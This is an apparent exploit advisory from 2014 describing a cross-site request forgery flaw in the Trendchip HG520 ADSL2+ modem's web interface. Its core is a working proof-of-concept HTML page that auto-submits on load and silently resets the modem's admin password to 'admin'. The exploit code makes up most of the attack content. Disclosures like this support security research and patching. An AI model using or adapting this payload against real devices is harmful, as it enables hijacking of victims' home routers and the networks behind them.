66 lines
No EOL
1.6 KiB
Text
66 lines
No EOL
1.6 KiB
Text
########################################################################
|
|
|
|
# Exploit Title: Trendchip HG520 ADSL2+ Wireless Modem CSRF Vulnerability
|
|
# Google Dork: N/A
|
|
# Date: 15/02/2014
|
|
# Exploit Author: Dhruv Shah
|
|
# Vendor Homepage: N/A
|
|
# Software Link : N/A
|
|
# Version: Firmware Version:2.11.38.0(RE0.C2B)3.9.9.5
|
|
# Tested on: Embedded Allegro RomPager webserver 4.07 UPnP/1.0 (ZyXEL
|
|
ZyWALL 2)
|
|
|
|
# Type of Application : Modem Web Application
|
|
# CVE : N/A
|
|
|
|
########################################################################
|
|
|
|
Cross Site Request Forgery
|
|
|
|
|
|
|
|
This Modem's Web Application , suffers from Cross-site request forgery
|
|
through which attacker can manipulate user data via sending him malicious
|
|
craft url.
|
|
|
|
|
|
|
|
The Modems's Application not using any security token to prevent it
|
|
against CSRF. You can manipulate any userdata. PoC and Exploit to change
|
|
user password:
|
|
|
|
In the POC the IP address in the POST is the modems IP address.
|
|
|
|
<html>
|
|
|
|
<body onload="javascript:document.forms[0].submit()">
|
|
|
|
<form method="POST" action="http://192.168.2.1/Forms/tools_admin_1"
|
|
name="tool_admin">
|
|
|
|
<input name="uiViewTools_Password" size="30" maxlength="30" value="admin"
|
|
type="PASSWORD">
|
|
|
|
<input name="uiViewTools_PasswordConfirm" size="30" maxlength="30"
|
|
value="admin" type="PASSWORD">
|
|
|
|
</form>
|
|
|
|
</body>
|
|
|
|
</html>
|
|
|
|
|
|
|
|
|
|
|
|
______________________
|
|
|
|
*Dhruv Shah* *aka Snypter*
|
|
http://security-geek.in/blog/
|
|
Blogger | Researcher | Consultant | Writer
|
|
Youtube <http://www.youtube.com/snypter> |
|
|
Facebook<http://www.facebook.com/dhruvshahs>|
|
|
Linkedin <http://in.linkedin.com/pub/dhruv-shah/26/4a6/aa0> |
|
|
Twitter<https://twitter.com/Snypter>|
|
|
Blog <http://security-geek.in/blog/> |